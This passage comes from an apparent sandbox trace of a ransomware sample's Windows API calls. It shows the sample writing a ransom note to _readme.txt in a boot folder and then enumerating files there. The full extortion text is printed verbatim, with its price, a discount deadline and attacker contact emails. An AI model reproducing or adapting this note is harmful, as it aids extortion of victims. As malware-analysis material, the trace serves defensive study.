Size=0x860) returned 0x333bc58 [0093.938] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.938] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.938] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.938] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.938] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.938] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0093.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.939] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.939] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.939] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.939] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.939] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.939] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.940] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.940] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.940] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.940] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.940] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.940] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.941] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.941] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.941] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.941] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.941] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.941] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0093.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0093.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.946] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.946] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.946] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.946] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.946] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.946] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.946] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.946] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.946] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.946] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.946] PathFindFileNameW (pszPath="C:\\Boot\\fr-FR\\") returned="fr-FR\\" [0093.946] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0093.946] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.946] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0093.946] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0093.947] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0093.947] PathFindFileNameW (pszPath="") returned="" [0093.947] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0093.947] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0093.948] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0093.948] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x32faf28 [0093.949] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32faf28 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0093.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x9b78ec8 [0093.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.949] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.949] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0093.949] FreeLibrary (hLibModule=0x75670000) returned 1 [0093.949] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.949] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32faf28 | out: hHeap=0x630000) returned 1 [0093.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.950] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.950] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x81c) returned 0x9b78ec8 [0093.950] PathAppendW (in: pszPath="C:\\Boot\\fr-FR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 1 [0093.950] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.950] PathFileExistsW (pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 0 [0093.977] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x9ba4d90 [0093.977] lstrcpyW (in: lpString1=0x9ba4d90, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" [0093.977] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0093.977] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79fd8 [0093.977] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\_readme.txt" (normalized: "c:\\boot\\fr-fr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0093.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x33515f0 [0093.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x853) returned 0x333bc58 [0093.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333bc58, cbMultiByte=2131, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1108 [0093.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x32d0db8 [0093.978] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.978] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33515f0 | out: hHeap=0x630000) returned 1 [0093.978] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1107 [0093.979] WriteFile (in: hFile=0x5c8, lpBuffer=0x32d0db8*, nNumberOfBytesToWrite=0x453, lpNumberOfBytesWritten=0x9e2fb64, lpOverlapped=0x0 | out: lpBuffer=0x32d0db8*, lpNumberOfBytesWritten=0x9e2fb64*=0x453, lpOverlapped=0x0) returned 1 [0093.980] CloseHandle (hObject=0x5c8) returned 1 [0093.980] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0093.980] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79fd8 | out: hHeap=0x630000) returned 1 [0093.980] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0093.980] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.980] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa18cb460, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa18cb460, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0093.981] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.981] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa18cb460, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa18cb460, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.981] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.981] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa18cb460, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa18cb460, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, 